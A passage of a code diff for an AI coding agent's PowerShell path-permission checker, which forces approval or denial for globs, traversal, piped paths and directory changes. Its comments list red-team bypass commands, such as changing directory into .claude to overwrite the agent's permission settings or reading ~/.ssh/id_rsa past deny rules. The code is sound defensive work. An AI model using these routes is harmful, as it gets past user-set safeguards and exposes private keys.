+ // missed those since `a1` is neither pure letters nor pure digits.
1148
+ const providerPathRegex =
1149
+ getPlatform() === 'windows' ? /^[a-z0-9]{2,}:/i : /^[a-z0-9]+:/i
1150
+ if (providerPathRegex.test(normalizedPath)) {
1151
+ return {
1152
+ allowed: false,
1153
+ resolvedPath: normalizedPath,
1154
+ decisionReason: {
1155
+ type: 'other',
1156
+ reason: `Path '${normalizedPath}' uses a non-filesystem provider and requires manual approval`,
1157
+ },
1158
+ }
1159
+ }
1160
+
1161
+ // SECURITY: Block glob patterns in write/create operations
1162
+ if (GLOB_PATTERN_REGEX.test(normalizedPath)) {
1163
+ if (operationType === 'write' || operationType === 'create') {
1164
+ return {
1165
+ allowed: false,
1166
+ resolvedPath: normalizedPath,
1167
+ decisionReason: {
1168
+ type: 'other',
1169
+ reason:
1170
+ 'Glob patterns are not allowed in write operations. Please specify an exact file path.',
1171
+ },
1172
+ }
1173
+ }
1174
+
1175
+ // For read operations with path traversal (e.g., /project/*/../../../etc/shadow),
1176
+ // resolve the full path (including glob chars) and validate that resolved path.
1177
+ // This catches patterns that escape the working directory via `..` after the glob.
1178
+ if (containsPathTraversal(normalizedPath)) {
1179
+ const absolutePath = isAbsolute(normalizedPath)
1180
+ ? normalizedPath
1181
+ : resolve(cwd, normalizedPath)
1182
+ const { resolvedPath, isCanonical } = safeResolvePath(
1183
+ getFsImplementation(),
1184
+ absolutePath,
1185
+ )
1186
+ const result = isPathAllowed(
1187
+ resolvedPath,
1188
+ toolPermissionContext,
1189
+ operationType,
1190
+ isCanonical ? [resolvedPath] : undefined,
1191
+ )
1192
+ return {
1193
+ allowed: result.allowed,
1194
+ resolvedPath,
1195
+ decisionReason: result.decisionReason,
1196
+ }
1197
+ }
1198
+
1199
+ // SECURITY (finding #15): Glob patterns for read operations cannot be
1200
+ // statically validated. getGlobBaseDirectory returns the directory before
1201
+ // the first glob char; only that base is realpathed. Anything matched by
1202
+ // the glob (including symlinks) is never examined. Example:
1203
+ // /project/*/passwd with symlink /project/link → /etc
1204
+ // Base dir is /project (allowed), but runtime expands * to 'link' and
1205
+ // reads /etc/passwd. We cannot validate symlinks inside glob expansion
1206
+ // without actually expanding the glob (requires filesystem access and
1207
+ // still races with attacker creating symlinks post-validation).
1208
+ //
1209
+ // Still check deny rules on the base directory so explicit Read(/project/**)
1210
+ // deny rules fire. If no deny matches, force ask.
1211
+ const basePath = getGlobBaseDirectory(normalizedPath)
1212
+ const absoluteBasePath = isAbsolute(basePath)
1213
+ ? basePath
1214
+ : resolve(cwd, basePath)
1215
+ const { resolvedPath } = safeResolvePath(
1216
+ getFsImplementation(),
1217
+ absoluteBasePath,
1218
+ )
1219
+ const permissionType = operationType === 'read' ? 'read' : 'edit'
1220
+ const denyRule = matchingRuleForInput(
1221
+ resolvedPath,
1222
+ toolPermissionContext,
1223
+ permissionType,
1224
+ 'deny',
1225
+ )
1226
+ if (denyRule !== null) {
1227
+ return {
1228
+ allowed: false,
1229
+ resolvedPath,
1230
+ decisionReason: { type: 'rule', rule: denyRule },
1231
+ }
1232
+ }
1233
+ return {
1234
+ allowed: false,
1235
+ resolvedPath,
1236
+ decisionReason: {
1237
+ type: 'other',
1238
+ reason:
1239
+ 'Glob patterns in paths cannot be statically validated — symlinks inside the glob expansion are not examined. Requires manual approval.',
1240
+ },
1241
+ }
1242
+ }
1243
+
1244
+ // Resolve path
1245
+ const absolutePath = isAbsolute(normalizedPath)
1246
+ ? normalizedPath
1247
+ : resolve(cwd, normalizedPath)
1248
+ const { resolvedPath, isCanonical } = safeResolvePath(
1249
+ getFsImplementation(),
1250
+ absolutePath,
1251
+ )
1252
+
1253
+ const result = isPathAllowed(
1254
+ resolvedPath,
1255
+ toolPermissionContext,
1256
+ operationType,
1257
+ isCanonical ? [resolvedPath] : undefined,
1258
+ )
1259
+ return {
1260
+ allowed: result.allowed,
1261
+ resolvedPath,
1262
+ decisionReason: result.decisionReason,
1263
+ }
1264
+ }
1265
+
1266
+ function getGlobBaseDirectory(filePath: string): string {
1267
+ const globMatch = filePath.match(GLOB_PATTERN_REGEX)
1268
+ if (!globMatch || globMatch.index === undefined) {
1269
+ return filePath
1270
+ }
1271
+ const beforeGlob = filePath.substring(0, globMatch.index)
1272
+ const lastSepIndex = Math.max(
1273
+ beforeGlob.lastIndexOf('/'),
1274
+ beforeGlob.lastIndexOf('\\'),
1275
+ )
1276
+ if (lastSepIndex === -1) return '.'
1277
+ return beforeGlob.substring(0, lastSepIndex + 1) || '/'
1278
+ }
1279
+
1280
+ /**
1281
+ * Element types that are safe to extract as literal path strings.
1282
+ *
1283
+ * Only element types with statically-known string values are safe for path
1284
+ * extraction. Variable and ExpandableString have runtime-determined values —
1285
+ * even though they're defended downstream ($ detection in validatePath's
1286
+ * `includes('$')` check, and the hasExpandableStrings security flag), excluding
1287
+ * them here is defense-in-direct: fail-safe at the earliest gate rather than
1288
+ * relying on downstream checks to catch them.
1289
+ *
1290
+ * Any other type (e.g., 'Other' for ArrayLiteralExpressionAst, 'SubExpression',
1291
+ * 'ScriptBlock', 'Variable', 'ExpandableString') cannot be statically validated
1292
+ * and must force an ask.
1293
+ */
1294
+ const SAFE_PATH_ELEMENT_TYPES = new Set<string>(['StringConstant', 'Parameter'])
1295
+
1296
+ /**
1297
+ * Extract file paths from a parsed PowerShell command element.
1298
+ * Uses the AST args to find positional and named path parameters.
1299
+ *
1300
+ * If any path argument has a complex elementType (e.g., array literal,
1301
+ * subexpression) that cannot be statically validated, sets
1302
+ * hasUnvalidatablePathArg so the caller can force an ask.
1303
+ */
1304
+ function extractPathsFromCommand(cmd: ParsedCommandElement): {
1305
+ paths: string[]
1306
+ operationType: FileOperationType
1307
+ hasUnvalidatablePathArg: boolean
1308
+ optionalWrite: boolean
1309
+ } {
1310
+ const canonical = resolveToCanonical(cmd.name)
1311
+ const config = CMDLET_PATH_CONFIG[canonical]
1312
+
1313
+ if (!config) {
1314
+ return {
1315
+ paths: [],
1316
+ operationType: 'read',
1317
+ hasUnvalidatablePathArg: false,
1318
+ optionalWrite: false,
1319
+ }
1320
+ }
1321
+
1322
+ // Build per-cmdlet known-param sets, merging in common parameters.
1323
+ const switchParams = [...config.knownSwitches, ...COMMON_SWITCHES]
1324
+ const valueParams = [...config.knownValueParams, ...COMMON_VALUE_PARAMS]
1325
+
1326
+ const paths: string[] = []
1327
+ const args = cmd.args
1328
+ // elementTypes[0] is the command name; elementTypes[i+1] corresponds to args[i]
1329
+ const elementTypes = cmd.elementTypes
1330
+ let hasUnvalidatablePathArg = false
1331
+ let positionalsSeen = 0
1332
+ const positionalSkip = config.positionalSkip ?? 0
1333
+
1334
+ function checkArgElementType(argIdx: number): void {
1335
+ if (!elementTypes) return
1336
+ const et = elementTypes[argIdx + 1]
1337
+ if (et && !SAFE_PATH_ELEMENT_TYPES.has(et)) {
1338
+ hasUnvalidatablePathArg = true
1339
+ }
1340
+ }
1341
+
1342
+ // Extract named parameter values (e.g., -Path "C:\foo")
1343
+ for (let i = 0; i < args.length; i++) {
1344
+ const arg = args[i]
1345
+ if (!arg) continue
1346
+
1347
+ // Check if this arg is a parameter name.
1348
+ // SECURITY: Use elementTypes as ground truth. PowerShell's tokenizer
1349
+ // accepts en-dash/em-dash/horizontal-bar (U+2013/2014/2015) as parameter
1350
+ // prefixes; a raw startsWith('-') check misses `–Path` (en-dash). The
1351
+ // parser maps CommandParameterAst → 'Parameter' regardless of dash char.
1352
+ // isPowerShellParameter also correctly rejects quoted "-Include"
1353
+ // (StringConstant, not a parameter).
1354
+ const argElementType = elementTypes ? elementTypes[i + 1] : undefined
1355
+ if (isPowerShellParameter(arg, argElementType)) {
1356
+ // Handle colon syntax: -Path:C:\secret
1357
+ // Normalize Unicode dash to ASCII `-` (pathParams are stored with `-`).
1358
+ const normalized = '-' + arg.slice(1)
1359
+ const colonIdx = normalized.indexOf(':', 1) // skip first char (the dash)
1360
+ const paramName =
1361
+ colonIdx > 0 ? normalized.substring(0, colonIdx) : normalized
1362
+ const paramLower = paramName.toLowerCase()
1363
+
1364
+ if (matchesParam(paramLower, config.pathParams)) {
1365
+ // Known path parameter — extract its value as a path.
1366
+ let value: string | undefined
1367
+ if (colonIdx > 0) {
1368
+ // Colon syntax: -Path:value — the whole thing is one element.
1369
+ // SECURITY: comma-separated values (e.g., -Path:safe.txt,/etc/passwd)
1370
+ // produce ArrayLiteralExpressionAst inside the CommandParameterAst.
1371
+ // PowerShell writes to ALL paths, but we see a single string.
1372
+ const rawValue = arg.substring(colonIdx + 1)
1373
+ if (hasComplexColonValue(rawValue)) {
1374
+ hasUnvalidatablePathArg = true
1375
+ } else {
1376
+ value = rawValue
1377
+ }
1378
+ } else {
1379
+ // Standard syntax: -Path value
1380
+ const nextVal = args[i + 1]
1381
+ const nextType = elementTypes ? elementTypes[i + 2] : undefined
1382
+ if (nextVal && !isPowerShellParameter(nextVal, nextType)) {
1383
+ value = nextVal
1384
+ checkArgElementType(i + 1)
1385
+ i++ // Skip the value
1386
+ }
1387
+ }
1388
+ if (value) {
1389
+ paths.push(value)
1390
+ }
1391
+ } else if (
1392
+ config.leafOnlyPathParams &&
1393
+ matchesParam(paramLower, config.leafOnlyPathParams)
1394
+ ) {
1395
+ // Leaf-only path parameter (e.g., New-Item -Name). PowerShell resolves
1396
+ // this relative to ANOTHER parameter (-Path), not cwd. validatePath
1397
+ // resolves against cwd (L930), so non-leaf values (separators,
1398
+ // traversal) resolve to the WRONG location and can miss deny rules
1399
+ // (deny→ask downgrade). Extract simple leaf filenames; flag anything
1400
+ // path-like.
1401
+ let value: string | undefined
1402
+ if (colonIdx > 0) {
1403
+ const rawValue = arg.substring(colonIdx + 1)
1404
+ if (hasComplexColonValue(rawValue)) {
1405
+ hasUnvalidatablePathArg = true
1406
+ } else {
1407
+ value = rawValue
1408
+ }
1409
+ } else {
1410
+ const nextVal = args[i + 1]
1411
+ const nextType = elementTypes ? elementTypes[i + 2] : undefined
1412
+ if (nextVal && !isPowerShellParameter(nextVal, nextType)) {
1413
+ value = nextVal
1414
+ checkArgElementType(i + 1)
1415
+ i++
1416
+ }
1417
+ }
1418
+ if (value !== undefined) {
1419
+ if (
1420
+ value.includes('/') ||
1421
+ value.includes('\\') ||
1422
+ value === '.' ||
1423
+ value === '..'
1424
+ ) {
1425
+ // Non-leaf: separators or traversal. Can't resolve correctly
1426
+ // without joining against -Path. Force ask.
1427
+ hasUnvalidatablePathArg = true
1428
+ } else {
1429
+ // Simple leaf: extract. Resolves to cwd/leaf (slightly wrong —
1430
+ // should be <-Path>/leaf) but -Path extraction covers the
1431
+ // directory, and a leaf filename can't traverse out of anywhere.
1432
+ paths.push(value)
1433
+ }
1434
+ }
1435
+ } else if (matchesParam(paramLower, switchParams)) {
1436
+ // Known switch parameter — takes no value, do NOT consume next arg.
1437
+ // (Colon syntax on a switch, e.g., -Confirm:$false, is self-contained
1438
+ // in one token and correctly falls through here without consuming.)
1439
+ } else if (matchesParam(paramLower, valueParams)) {
1440
+ // Known value-taking non-path parameter (e.g., -Encoding UTF8, -Filter *.txt).
1441
+ // Consume its value; do NOT validate as path, but DO check elementType.
1442
+ // SECURITY: A Variable elementType (e.g., $env:ANTHROPIC_API_KEY) in any
1443
+ // argument position means the runtime value is not statically knowable.
1444
+ // Without this check, `-Value $env:SECRET` would be silently auto-allowed
1445
+ // in acceptEdits mode because the Variable elementType was never examined.
1446
+ if (colonIdx > 0) {
1447
+ // Colon syntax: -Value:$env:FOO — the value is embedded in the token.
1448
+ // The outer CommandParameterAst 'Parameter' type masks the inner
1449
+ // expression type. Check for expression markers that indicate a
1450
+ // non-static value (mirrors pathParams colon-syntax guards).
1451
+ const rawValue = arg.substring(colonIdx + 1)
1452
+ if (hasComplexColonValue(rawValue)) {
1453
+ hasUnvalidatablePathArg = true
1454
+ }
1455
+ } else {
1456
+ const nextArg = args[i + 1]
1457
+ const nextArgType = elementTypes ? elementTypes[i + 2] : undefined
1458
+ if (nextArg && !isPowerShellParameter(nextArg, nextArgType)) {
1459
+ checkArgElementType(i + 1)
1460
+ i++ // Skip the parameter's value
1461
+ }
1462
+ }
1463
+ } else {
1464
+ // Unknown parameter — we do not understand this invocation.
1465
+ // SECURITY: This is the structural fix for the KNOWN_SWITCH_PARAMS
1466
+ // whack-a-mole. Rather than guess whether this param is a switch
1467
+ // (and risk swallowing a positional path) or takes a value (and
1468
+ // risk the same), we flag the whole command as unvalidatable.
1469
+ // The caller will force an ask.
1470
+ hasUnvalidatablePathArg = true
1471
+ // SECURITY: Even though we don't recognize this param, if it uses
1472
+ // colon syntax (-UnknownParam:/etc/hosts) the bound value might be
1473
+ // a filesystem path. Extract it into paths[] so deny-rule matching
1474
+ // still runs. Without this, the value is trapped inside the single
1475
+ // token and paths=[] means deny rules are never consulted —
1476
+ // downgrading deny to ask. This is defense-in-depth: the primary
1477
+ // fix is adding all known aliases to pathParams above.
1478
+ if (colonIdx > 0) {
1479
+ const rawValue = arg.substring(colonIdx + 1)
1480
+ if (!hasComplexColonValue(rawValue)) {
1481
+ paths.push(rawValue)
1482
+ }
1483
+ }
1484
+ // Continue the loop so we still extract any recognizable paths
1485
+ // (useful for the ask message), but the flag ensures overall 'ask'.
1486
+ }
1487
+ continue
1488
+ }
1489
+
1490
+ // Positional arguments: extract as paths (e.g., Get-Content file.txt)
1491
+ // The first positional arg is typically the source path.
1492
+ // Skip leading positionals that are non-path values (e.g., iwr's -Uri).
1493
+ if (positionalsSeen < positionalSkip) {
1494
+ positionalsSeen++
1495
+ continue
1496
+ }
1497
+ positionalsSeen++
1498
+ checkArgElementType(i)
1499
+ paths.push(arg)
1500
+ }
1501
+
1502
+ return {
1503
+ paths,
1504
+ operationType: config.operationType,
1505
+ hasUnvalidatablePathArg,
1506
+ optionalWrite: config.optionalWrite ?? false,
1507
+ }
1508
+ }
1509
+
1510
+ /**
1511
+ * Checks path constraints for PowerShell commands.
1512
+ * Extracts file paths from the parsed AST and validates they are
1513
+ * within allowed directories.
1514
+ *
1515
+ * @param compoundCommandHasCd - Whether the full compound command contains a
1516
+ * cwd-changing cmdlet (Set-Location/Push-Location/Pop-Location/New-PSDrive,
1517
+ * excluding no-op Set-Location-to-CWD). When true, relative paths in ANY
1518
+ * statement cannot be trusted — PowerShell executes statements sequentially
1519
+ * and a cd in statement N changes the cwd for statement N+1, but this
1520
+ * validator resolves all paths against the stale Node process cwd.
1521
+ * BashTool parity (BashTool/pathValidation.ts:630-655).
1522
+ *
1523
+ * @returns
1524
+ * - 'ask' if any path command tries to access outside allowed directories
1525
+ * - 'deny' if a deny rule explicitly blocks the path
1526
+ * - 'passthrough' if no path commands were found or all paths are valid
1527
+ */
1528
+ export function checkPathConstraints(
1529
+ input: { command: string },
1530
+ parsed: ParsedPowerShellCommand,
1531
+ toolPermissionContext: ToolPermissionContext,
1532
+ compoundCommandHasCd = false,
1533
+ ): PermissionResult {
1534
+ if (!parsed.valid) {
1535
+ return {
1536
+ behavior: 'passthrough',
1537
+ message: 'Cannot validate paths for unparsed command',
1538
+ }
1539
+ }
1540
+
1541
+ // SECURITY: Two-pass approach — check ALL statements/paths so deny rules
1542
+ // always take precedence over ask. Without this, an ask on statement 1
1543
+ // could return before checking statement 2 for deny rules, letting the
1544
+ // user approve a command that includes a denied path.
1545
+ let firstAsk: PermissionResult | undefined
1546
+
1547
+ for (const statement of parsed.statements) {
1548
+ const result = checkPathConstraintsForStatement(
1549
+ statement,
1550
+ toolPermissionContext,
1551
+ compoundCommandHasCd,
1552
+ )
1553
+ if (result.behavior === 'deny') {
1554
+ return result
1555
+ }
1556
+ if (result.behavior === 'ask' && !firstAsk) {
1557
+ firstAsk = result
1558
+ }
1559
+ }
1560
+
1561
+ return (
1562
+ firstAsk ?? {
1563
+ behavior: 'passthrough',
1564
+ message: 'All path constraints validated successfully',
1565
+ }
1566
+ )
1567
+ }
1568
+
1569
+ function checkPathConstraintsForStatement(
1570
+ statement: ParsedPowerShellCommand['statements'][number],
1571
+ toolPermissionContext: ToolPermissionContext,
1572
+ compoundCommandHasCd = false,
1573
+ ): PermissionResult {
1574
+ const cwd = getCwd()
1575
+ let firstAsk: PermissionResult | undefined
1576
+
1577
+ // SECURITY: BashTool parity — block path operations in compound commands
1578
+ // containing a cwd-changing cmdlet (BashTool/pathValidation.ts:630-655).
1579
+ //
1580
+ // When the compound contains Set-Location/Push-Location/Pop-Location/
1581
+ // New-PSDrive, relative paths in later statements resolve against the
1582
+ // CHANGED cwd at runtime, but this validator resolves them against the
1583
+ // STALE getCwd() snapshot. Example attack (finding #3):
1584
+ // Set-Location ./.claude; Set-Content ./settings.json '...'
1585
+ // Validator sees ./settings.json → /project/settings.json (not a config file).
1586
+ // Runtime writes /project/.claude/settings.json (Claude's permission config).
1587
+ //
1588
+ // ALTERNATIVE APPROACH (rejected): simulate cwd through the statement chain
1589
+ // — after `Set-Location ./.claude`, validate subsequent statements with
1590
+ // cwd='./.claude'. This would be more permissive but requires careful
1591
+ // handling of:
1592
+ // - Push-Location/Pop-Location stack semantics
1593
+ // - Set-Location with no args (→ home on some platforms)
1594
+ // - New-PSDrive root mapping (arbitrary filesystem root)
1595
+ // - Conditional/loop statements where cd may or may not execute
1596
+ // - Error cases where the cd target can't be statically determined
1597
+ // For now we take the conservative approach of requiring manual approval.
1598
+ //
1599
+ // Unlike BashTool which gates on `operationType !== 'read'`, we also block
1600
+ // READS (finding #27): `Set-Location ~; Get-Content ./.ssh/id_rsa` bypasses
1601
+ // Read(~/.ssh/**) deny rules because the validator matched the deny against
1602
+ // /project/.ssh/id_rsa. Reads from mis-resolved paths leak data just as
1603
+ // writes destroy it. We still run deny-rule matching below (via firstAsk,
1604
+ // not early return) so explicit deny rules on the stale-resolved path are
1605
+ // honored — deny > ask in the caller's reduce.
1606
+ if (compoundCommandHasCd) {
1607
+ firstAsk = {
1608
+ behavior: 'ask',
1609
+ message:
1610
+ 'Compound command changes working directory (Set-Location/Push-Location/Pop-Location/New-PSDrive) — relative paths cannot be validated against the original cwd and require manual approval',
1611
+ decisionReason: {
1612
+ type: 'other',
1613
+ reason:
1614
+ 'Compound command contains cd with path operation — manual approval required to prevent path resolution bypass',
1615
+ },
1616
+ }
1617
+ }
1618
+
1619
+ // SECURITY: Track whether this statement contains a non-CommandAst pipeline
1620
+ // element (string literal, variable, array expression). PowerShell pipes
1621
+ // these values to downstream cmdlets, often binding to -Path. Example:
1622
+ // `'/etc/passwd' | Remove-Item` — the string is piped to Remove-Item's -Path,
1623
+ // but Remove-Item has no explicit args so extractPathsFromCommand returns
1624
+ // zero paths and the command would passthrough. If ANY downstream cmdlet
1625
+ // appears alongside an expression source, we force an ask — the piped
1626
+ // path is unvalidatable regardless of operation type (reads leak data;
1627
+ // writes destroy it).
1628
+ let hasExpressionPipelineSource = false
1629
+ // Track the non-CommandAst element's text for deny-rule guessing (finding #23).
1630
+ // `'.git/hooks/pre-commit' | Remove-Item` — path comes via pipeline, paths=[]
1631
+ // from extractPathsFromCommand, so the deny loop below never iterates. We
1632
+ // feed the pipeline-source text through checkDenyRuleForGuessedPath so
1633
+ // explicit Edit(.git/**) deny rules still fire.
1634
+ let pipelineSourceText: string | undefined
1635
+
1636
+ for (const cmd of statement.commands) {
1637
+ if (cmd.elementType !== 'CommandAst') {
1638
+ hasExpressionPipelineSource = true
1639
+ pipelineSourceText = cmd.text
1640
+ continue
1641
+ }
1642
+
1643
+ const { paths, operationType, hasUnvalidatablePathArg, optionalWrite } =
1644
+ extractPathsFromCommand(cmd)
1645
+
1646
+ // SECURITY: Cmdlet receiving piped path from expression source.
1647
+ // `'/etc/shadow' | Get-Content` — Get-Content extracts zero paths
1648
+ // (no explicit args). The path comes from the pipeline, which we cannot
1649
+ // statically validate. Previously exempted reads (`operationType !== 'read'`),
1650
+ // but that was a bypass (review comment 2885739292): reads from
1651
+ // unvalidatable paths are still a security risk. Ask regardless of op type.
1652
+ if (hasExpressionPipelineSource) {
1653
+ const canonical = resolveToCanonical(cmd.name)
1654
+ // SECURITY (finding #23): Before falling back to ask, check if the
1655
+ // pipeline-source text matches a deny rule. `'.git/hooks/pre-commit' |
1656
+ // Remove-Item` should DENY (not ask) when Edit(.git/**) is configured.
1657
+ // Strip surrounding quotes (string literals are quoted in .text) and
1658
+ // feed through the same deny-guess helper used for ::/backtick paths.
1659
+ if (pipelineSourceText !== undefined) {
1660
+ const stripped = pipelineSourceText.replace(/^['"]|['"]$/g, '')
1661
+ const denyHit = checkDenyRuleForGuessedPath(
1662
+ stripped,
1663
+ cwd,
1664
+ toolPermissionContext,
1665
+ operationType,
1666
+ )
1667
+ if (denyHit) {
1668
+ return {
1669
+ behavior: 'deny',
1670
+ message: `${canonical} targeting '${denyHit.resolvedPath}' was blocked by a deny rule`,
1671
+ decisionReason: { type: 'rule', rule: denyHit.rule },
1672
+ }
1673
+ }
1674
+ }
1675
+ firstAsk ??= {
1676
+ behavior: 'ask',
1677
+ message: `${canonical} receives its path from a pipeline expression source that cannot be statically validated and requires manual approval`,
1678
+ }
1679
+ // Don't continue — fall through to path loop so deny rules on
1680
+ // extracted paths are still checked.
1681
+ }
1682
+
1683
+ // SECURITY: Array literals, subexpressions, and other complex
1684
+ // argument types cannot be statically validated. An array literal
1685
+ // like `-Path ./safe.txt, /etc/passwd` produces a single 'Other'
1686
+ // element whose combined text may resolve within CWD while
1687
+ // PowerShell actually writes to ALL paths in the array.
1688
+ if (hasUnvalidatablePathArg) {
1689
+ const canonical = resolveToCanonical(cmd.name)
1690
+ firstAsk ??= {
1691
+ behavior: 'ask',
1692
+ message: `${canonical} uses a parameter or complex path expression (array literal, subexpression, unknown parameter, etc.) that cannot be statically validated and requires manual approval`,
1693
+ }
1694
+ // Don't continue — fall through to path loop so deny rules on
1695
+ // extracted paths are still checked.
1696
+ }
1697
+
1698
+ // SECURITY: Write cmdlet in CMDLET_PATH_CONFIG that extracted zero paths.
1699
+ // Either (a) the cmdlet has no args at all (`Remove-Item` alone —
1700
+ // PowerShell will error, but we shouldn't optimistically assume that), or
1701
+ // (b) we failed to recognize the path among the args (shouldn't happen
1702
+ // with the unknown-param fail-safe, but defense-in-depth). Conservative:
1703
+ // write operation with no validated target → ask.
1704
+ // Read cmdlets and pop-location (pathParams: []) are exempt.
1705
+ // optionalWrite cmdlets (Invoke-WebRequest/Invoke-RestMethod without
1706
+ // -OutFile) are ALSO exempt — they only write to disk when a pathParam is
1707
+ // present; without one, output goes to the pipeline. The
1708
+ // hasUnvalidatablePathArg check above already covers unknown-param cases.
1709
+ if (
1710
+ operationType !== 'read' &&
1711
+ !optionalWrite &&
1712
+ paths.length === 0 &&
1713
+ CMDLET_PATH_CONFIG[resolveToCanonical(cmd.name)]
1714
+ ) {
1715
+ const canonical = resolveToCanonical(cmd.name)
1716
+ firstAsk ??= {
1717
+ behavior: 'ask',
1718
+ message: `${canonical} is a write operation but no target path could be determined; requires manual approval`,
1719
+ }
1720
+ continue
1721
+ }
1722
+
1723
+ // SECURITY: bash-parity hard-deny for removal cmdlets on
1724
+ // system-critical paths. BashTool has isDangerousRemovalPath which
1725
+ // hard-DENIES `rm /`, `rm ~`, `rm /etc`, etc. regardless of user config.
1726
+ // Port: remove-item (and aliases rm/del/ri/rd/rmdir/erase → resolveToCanonical)
1727
+ // on a dangerous path → deny (not ask). User cannot approve system32 deletion.
1728
+ const isRemoval = resolveToCanonical(cmd.name) === 'remove-item'
1729
+
1730
+ for (const filePath of paths) {
1731
+ // Hard-deny removal of dangerous system paths (/, ~, /etc, etc.).
1732
+ // Check the RAW path (pre-realpath) first: safeResolvePath can
1733
+ // canonicalize '/' → 'C:\' (Windows) or '/var/...' → '/private/var/...'
1734
+ // (macOS) which defeats isDangerousRemovalPath's string comparisons.
1735
+ if (isRemoval && isDangerousRemovalRawPath(filePath)) {
1736
+ return dangerousRemovalDeny(filePath)
1737
+ }
1738
+
1739
+ const { allowed, resolvedPath, decisionReason } = validatePath(
1740
+ filePath,
1741
+ cwd,
1742
+ toolPermissionContext,
1743
+ operationType,
1744
+ )
1745
+
1746
+ // Also check the resolved path — catches symlinks that resolve to a
1747
+ // protected location.
1748
+ if (isRemoval && isDangerousRemovalPath(resolvedPath)) {
1749
+ return dangerousRemovalDeny(resolvedPath)
1750
+ }
1751
+
1752
+ if (!allowed) {
1753
+ const canonical = resolveToCanonical(cmd.name)
1754
+ const workingDirs = Array.from(
1755
+ allWorkingDirectories(toolPermissionContext),
1756
+ )
1757
+ const dirListStr = formatDirectoryList(workingDirs)
1758
+
1759
+ const message =
1760
+ decisionReason?.type === 'other' ||
1761
+ decisionReason?.type === 'safetyCheck'
1762
+ ? decisionReason.reason
1763
+ : `${canonical} targeting '${resolvedPath}' was blocked. For security, Claude Code may only access files in the allowed working directories for this session: ${dirListStr}.`
1764
+
1765
+ if (decisionReason?.type === 'rule') {
1766
+ return {
1767
+ behavior: 'deny',
1768
+ message,
1769
+ decisionReason,
1770
+ }
1771
+ }
1772
+
1773
+ const suggestions: PermissionUpdate[] = []
1774
+ if (resolvedPath) {
1775
+ if (operationType === 'read') {
1776
+ const suggestion = createReadRuleSuggestion(
1777
+ getDirectoryForPath(resolvedPath),
1778
+ 'session',
1779
+ )
1780
+ if (suggestion) {
1781
+ suggestions.push(suggestion)
1782
+ }
1783
+ } else {
1784
+ suggestions.push({
1785
+ type: 'addDirectories',
1786
+ directories: [getDirectoryForPath(resolvedPath)],
1787
+ destination: 'session',
1788
+ })
1789
+ }
1790
+ }
1791
+
1792
+ if (operationType === 'write' || operationType === 'create') {
1793
+ suggestions.push({
1794
+ type: 'setMode',
1795
+ mode: 'acceptEdits',
1796
+ destination: 'session',
1797
+ })
1798
+ }
1799
+
1800
+ firstAsk ??= {
1801
+ behavior: 'ask',
1802
+ message,
1803
+ blockedPath: resolvedPath,
1804
+ decisionReason,
1805
+ suggestions,
1806
+ }
1807
+ }
1808
+ }
1809
+ }
1810
+
1811
+ // Also check nested commands from control flow
1812
+ if (statement.nestedCommands) {
1813
+ for (const cmd of statement.nestedCommands) {
1814
+ const { paths, operationType, hasUnvalidatablePathArg, optionalWrite } =
1815
+ extractPathsFromCommand(cmd)
1816
+
1817
+ if (hasUnvalidatablePathArg) {
1818
+ const canonical = resolveToCanonical(cmd.name)
1819
+ firstAsk ??= {
1820
+ behavior: 'ask',
1821
+ message: `${canonical} uses a parameter or complex path expression (array literal, subexpression, unknown parameter, etc.) that cannot be statically validated and requires manual approval`,
1822
+ }
1823
+ // Don't continue — fall through to path loop for deny checks.
1824
+ }
1825
+
1826
+ // SECURITY: Write cmdlet with zero extracted paths (mirrors main loop).
1827
+ // optionalWrite cmdlets exempt — see main-loop comment.
1828
+ if (
1829
+ operationType !== 'read' &&
1830
+ !optionalWrite &&
1831
+ paths.length === 0 &&
1832
+ CMDLET_PATH_CONFIG[resolveToCanonical(cmd.name)]
1833
+ ) {
1834
+ const canonical = resolveToCanonical(cmd.name)
1835
+ firstAsk ??= {
1836
+ behavior: 'ask',
1837
+ message: `${canonical} is a write operation but no target path could be determined; requires manual approval`,
1838
+ }
1839
+ continue
1840
+ }
1841
+
1842
+ // SECURITY: bash-parity hard-deny for removal on system-critical
1843
+ // paths — mirror the main-loop check above. Without this,
1844
+ // `if ($true) { Remove-Item / }` routes through nestedCommands and
1845
+ // downgrades deny→ask, letting the user approve root deletion.
1846
+ const isRemoval = resolveToCanonical(cmd.name) === 'remove-item'
1847
+
1848
+ for (const filePath of paths) {
1849
+ // Check the RAW path first (pre-realpath); see main-loop comment.
1850
+ if (isRemoval && isDangerousRemovalRawPath(filePath)) {
1851
+ return dangerousRemovalDeny(filePath)
1852
+ }
1853
+
1854
+ const { allowed, resolvedPath, decisionReason } = validatePath(
1855
+ filePath,
1856
+ cwd,
1857
+ toolPermissionContext,
1858
+ operationType,
1859
+ )
1860
+
1861
+ if (isRemoval && isDangerousRemovalPath(resolvedPath)) {
1862
+ return dangerousRemovalDeny(resolvedPath)
1863
+ }
1864
+
1865
+ if (!allowed) {
1866
+ const canonical = resolveToCanonical(cmd.name)
1867
+ const workingDirs = Array.from(
1868
+ allWorkingDirectories(toolPermissionContext),
1869
+ )
1870
+ const dirListStr = formatDirectoryList(workingDirs)
1871
+
1872
+ const message =
1873
+ decisionReason?.type === 'other' ||
1874
+ decisionReason?.type === 'safetyCheck'
1875
+ ? decisionReason.reason
1876
+ : `${canonical} targeting '${resolvedPath}' was blocked. For security, Claude Code may only access files in the allowed working directories for this session: ${dirListStr}.`
1877
+
1878
+ if (decisionReason?.type === 'rule') {
1879
+ return {
1880
+ behavior: 'deny',
1881
+ message,
1882
+ decisionReason,
1883
+ }
1884
+ }
1885
+
1886
+ const suggestions: PermissionUpdate[] = []
1887
+ if (resolvedPath) {
1888
+ if (operationType === 'read') {
1889
+ const suggestion = createReadRuleSuggestion(
1890
+ getDirectoryForPath(resolvedPath),
1891
+ 'session',
1892
+ )
1893
+ if (suggestion) {
1894
+ suggestions.push(suggestion)
1895
+ }
1896
+ } else {
1897
+ suggestions.push({
1898
+ type: 'addDirectories',
1899
+ directories: [getDirectoryForPath(resolvedPath)],
1900
+ destination: 'session',
1901
+ })
1902
+ }
1903
+ }
1904
+
1905
+ if (operationType === 'write' || operationType === 'create') {
1906
+ suggestions.push({
1907
+ type: 'setMode',
1908
+ mode: 'acceptEdits',
1909
+ destination: 'session',
1910
+ })
1911
+ }
1912
+
1913
+ firstAsk ??= {
1914
+ behavior: 'ask',
1915
+ message,
1916
+ blockedPath: resolvedPath,
1917
+ decisionReason,
1918
+ suggestions,
1919
+ }
1920
+ }
1921
+ }
1922
+
1923
+ // Red-team P11/P14: step 5 at powershellPermissions.ts:970 already
1924
